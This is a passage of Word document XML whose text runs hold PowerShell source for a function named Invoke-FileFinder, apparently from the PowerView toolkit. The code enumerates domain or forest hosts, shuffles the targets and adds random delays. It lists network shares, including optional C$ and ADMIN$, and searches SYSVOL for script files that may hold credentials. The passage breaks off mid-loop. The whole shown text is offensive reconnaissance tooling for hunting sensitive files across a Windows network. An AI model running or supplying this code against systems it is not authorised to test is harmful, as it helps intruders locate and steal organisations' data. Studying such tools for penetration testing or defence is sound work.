    <w:p w14:paraId="6DA4FB54" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    begin {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D4AB5C1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if ($PSBoundParameters['Debug']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662BB136" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $DebugPreference = 'Continue'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353A4773" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D3D0A9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="33F89A9E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # random object for delay</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63507437" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $RandNo = New-Object System.Random</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20875380" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="029B1019" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Write-Verbose "[*] Running Invoke-FileFinder with delay of $Delay"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C54436" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="57D676C7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Shares = @()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599792BF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="26E59D27" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # figure out the shares we want to ignore</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51CAACFF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String[]] $ExcludedShares = @("C$", "ADMIN$")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675B8595" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3D2081E4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # see if we're specifically including any of the normally excluded sets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2323DCB9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if ($IncludeC) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D77754" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if ($IncludeAdmin) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3209AE5A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $ExcludedShares = @()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38728E8F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD3D1F4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622A347D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $ExcludedShares = @("ADMIN$")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082C77C1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CFAE083" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F83BA50" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6B8F55CB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if ($IncludeAdmin) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74DB3891" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if ($IncludeC) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1915FB34" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                $ExcludedShares = @()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B52BC59" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3010A6F5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E1CBF7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $ExcludedShares = @("C$")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365A76BB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4789C005" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9862BA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1310240F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # delete any existing output file if it already exists</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D44068C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if(!$NoClobber) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BC246A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if ($OutFile -and (Test-Path -Path $OutFile)) { Remove-Item -Path $OutFile }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DCDE493" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC6D516" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0CE9863C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # if there's a set of terms specified to search for</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CF6C15" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if ($TermList) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31725BFD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            ForEach ($Term in Get-Content -Path $TermList) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3FC437" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                if (($Term -ne $Null) -and ($Term.trim() -ne '')) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28573A83" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $SearchTerms += $Term</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356C86D6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7D9204" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5767DD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47385CE8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5850FF08" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # if we're hard-passed a set of shares</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3654AC13" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if($ShareList) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695A2A65" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            ForEach ($Item in Get-Content -Path $ShareList) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43194832" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                if (($Item -ne $Null) -and ($Item.trim() -ne '')) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF38865" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    # exclude any "[tab]- commants", i.e. the output from Invoke-ShareFinder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C4698E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $Share = $Item.Split("`t")[0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72121E69" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $Shares += $Share</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C259A54" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099E6FD8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E357774" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043469A5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C5A3E0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # if we're using a host file list, read the targets in and add them to the target list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2CA669" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if($ComputerFile) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F8E268" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $ComputerName = Get-Content -Path $ComputerFile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7412AEEF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BCDEA1C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="759ADB35" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if(!$ComputerName) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D87272" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1AAB525D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                if($Domain) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3983702F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $TargetDomains = @($Domain)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02738FF9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2666EF38" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                elseif($SearchForest) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F3EDD1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    # get ALL the domains in the forest to search</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F75DCB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $TargetDomains = Get-NetForestDomain | ForEach-Object { $_.Name }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D5F9AD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D8663F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D7573A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    # use the local domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403A2BD4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $TargetDomains = @( (Get-NetDomain).name )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B0431A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0B032E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3485C12C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                if($SearchSYSVOL) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A507713" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    ForEach ($Domain in $TargetDomains) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF4CF52" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $DCSearchPath = "\\$Domain\SYSVOL\"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C25835" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        Write-Verbose "[*] Adding share search path $DCSearchPath"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FBE8D71" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $Shares += $DCSearchPath</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C451DFD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129C4928" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    if(!$SearchTerms) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10AF39A2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                        # search for interesting scripts on SYSVOL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D42B4E0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $SearchTerms = @('.vbs', '.bat', '.ps1')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7321B19D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA7D5BC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37BF7752" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47515F87" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    [array]$ComputerName = @()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CA969C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5200ACF9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    ForEach ($Domain in $TargetDomains) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF89F2D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        Write-Verbose "[*] Querying domain $Domain for hosts"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FF6F92" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $ComputerName += Get-NetComputer -Filter $ComputerFilter -ADSpath $ComputerADSpath -Domain $Domain -DomainController $DomainController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C67EF02" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A48F7B0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5C532494" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    # remove any null target hosts, uniquify the list and shuffle it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CAF3587" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $ComputerName = $ComputerName | Where-Object { $_ } | Sort-Object -Unique | Sort-Object { Get-Random }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A56E3B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    if($($ComputerName.Count) -eq 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D82C6BE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        throw "No hosts found!"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0F43CA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA84AEA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4EC521" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54ED5FD3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3181FD84" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="62E77EF4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # script block that enumerates shares and files on a server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65FE33D9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $HostEnumBlock = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64180A89" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            param($ComputerName, $Ping, $ExcludedShares, $SearchTerms, $ExcludeFolders, $OfficeDocs, $ExcludeHidden, $FreshEXEs, $CheckWriteAccess, $OutFile, $UsePSDrive)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09590988" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="37CF5F21" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            Write-Verbose "ComputerName: $ComputerName"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29813BB9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            Write-Verbose "ExcludedShares: $ExcludedShares"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DDCEDAA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            $SearchShares = @()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F967B34" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4B018209" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if($ComputerName.StartsWith("\\")) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E66EC3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                # if a share is passed as the server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A33DA01" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $SearchShares += $ComputerName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023EFD75" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458E219C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78AC28AD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                # if we're enumerating the shares on the target server first</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA15EDE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Up = $True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC16BBF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                if($Ping) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534F7D64" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $Up = Test-Connection -Count 1 -Quiet -ComputerName $ComputerName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8A3AAC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F9AE0D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                if($Up) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35971332" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    # get the shares for this host and display what we find</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC84358" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $Shares = Get-NetShare -ComputerName $ComputerName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40CC9389" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    ForEach ($Share in $Shares) {</w:t>
